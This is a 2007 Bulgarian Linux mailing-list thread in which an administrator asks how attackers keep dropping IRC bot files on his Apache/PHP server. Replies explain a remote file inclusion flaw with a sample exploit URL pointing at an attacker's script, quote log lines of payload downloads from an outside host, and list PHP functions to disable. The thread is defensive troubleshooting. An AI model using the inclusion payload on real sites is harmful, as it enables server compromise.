|
|
Re: [Lug-bg] пробив през апаче и пхп :(
- Subject: Re: [Lug-bg] пробив през апаче и пхп :(
- From: "deb4o" <deb@xxxxxxx>
- Date: Thu, 12 Jul 2007 13:53:53 +0300
|
safe_mode не е добър вариант за решение, имам
доста виртуални хостове на сайтове, никой от тях не използва perl/cgi а само
пхп
за всеки сайта съм сетнал open_base dir и не
могат да отварят нищо освен собсвената си директория.
единственно session_path не съм сетвал
допълнително и е по подразбиране в /tmp
/var/tmp съм я направил като symbolic link към
дяла /tmp и там не могат да се стартират бинарни файлове.
----- Original Message -----
Sent: Thursday, July 12, 2007 11:08
AM
Subject: Re: [Lug-bg] пробив през апаче и
пхп :(
Имах подобен проблем с един от сайтовете при мен. Можеш в
php.ini да добавиш примерно:
disable_functions =
exec,passthru,system,proc_open,shell_exec
С това ще
забраниш изпълнението по-често използваните функции за изпълнение на
команди.
Преди това обаче е добре да разбереш как успяват да накарат
PHPто да изпълнява въпросните функции. В моя случай в бъгавият сайт имаше
глупост от типа на:
include( $path . "/neshtosi.php"
);
Променливата $path не винаги се установяваше и хахорите
извикваха адрес от типа на:
http://my.site.com/shitty-script.php?path=http://their.site.com/their-script.txt&
Ако
имаш много сайтове и не можеш да разбереш през кой от тях ти правят мизерията,
погледни кой е потребителят-собственик на изтеглените файлове. Това би
свършило работа, ако PHP работи като CGI и използваш SUExec. Ако е като модул
и имаш късмета да си с Apache 2, пробвай да инсталираш MPM ITK (в Debian и
Ubuntu пакетът е apache2-mpm-itk). Разбереш ли кой е потребителят, ще трябва
да претърсиш файловете им за include, include_once, require и require_once, за
да видиш кои от тях използват динамични несигурни пътища. Нищо чудно това да е
стара версия на софтуер с известни
проблеми.
Поздрави,
Валери.
deb4o wrote:
няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на
irc bot
все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги
страртират.
но искам да разбера къде е дупката в апачето.
Apache 2.0.53 и php 4.3.9
Така и не мога да разбера от къде влизат. търсих по логовете но само
единственно в error log-a на апачето намирам подобни на тези неща:
--00:43:08-- http://private.whitehat.ro/flood
=> `flood'
Resolving private.whitehat.ro... 72.22.77.22
Connecting to private.whitehat.ro[72.22.77.22]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 208,412 [text/plain]
0K .......... .......... .......... .......... .......... 24% 60.12
KB/s
50K .......... .......... .......... .......... .......... 49% 237.64
KB/s
100K .......... .......... .......... .......... .......... 73% 16.05
KB/s
150K .......... .......... .......... .......... .......... 98% 60.06
KB/s
200K ... 100% 10.13
MB/s
00:43:13 (40.79 KB/s) - `flood' saved [208412/208412]
-------------------
--11:39:45-- http://private.whitehat.ro/n.jpg
=> `n.jpg'
Resolving private.whitehat.ro... 72.22.77.22
Connecting to private.whitehat.ro[72.22.77.22]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 261,375 [image/jpeg]
0K .......... .......... .......... .......... .......... 19% 60.85
KB/s
50K .......... .......... .......... .......... .......... 39% 122.81
KB/s
100K .......... .......... .......... .......... .......... 58% 16.38
KB/s
150K .......... .......... .......... .......... .......... 78% 61.60
KB/s
200K .......... .......... .......... .......... .......... 97% 81.52
KB/s
250K ..... 100% 1.02
MB/s
11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375]
_______________________________________________
Lug-bg mailing list
Lug-bg@xxxxxxxxxxxxxxxxxx
http://linux-bulgaria.org/mailman/listinfo/lug-bg
_______________________________________________
Lug-bg mailing
list
Lug-bg@xxxxxxxxxxxxxxxxxx
http://linux-bulgaria.org/mailman/listinfo/lug-bg
|
_______________________________________________
Lug-bg mailing list
Lug-bg@xxxxxxxxxxxxxxxxxx
http://linux-bulgaria.org/mailman/listinfo/lug-bg
|
|
|
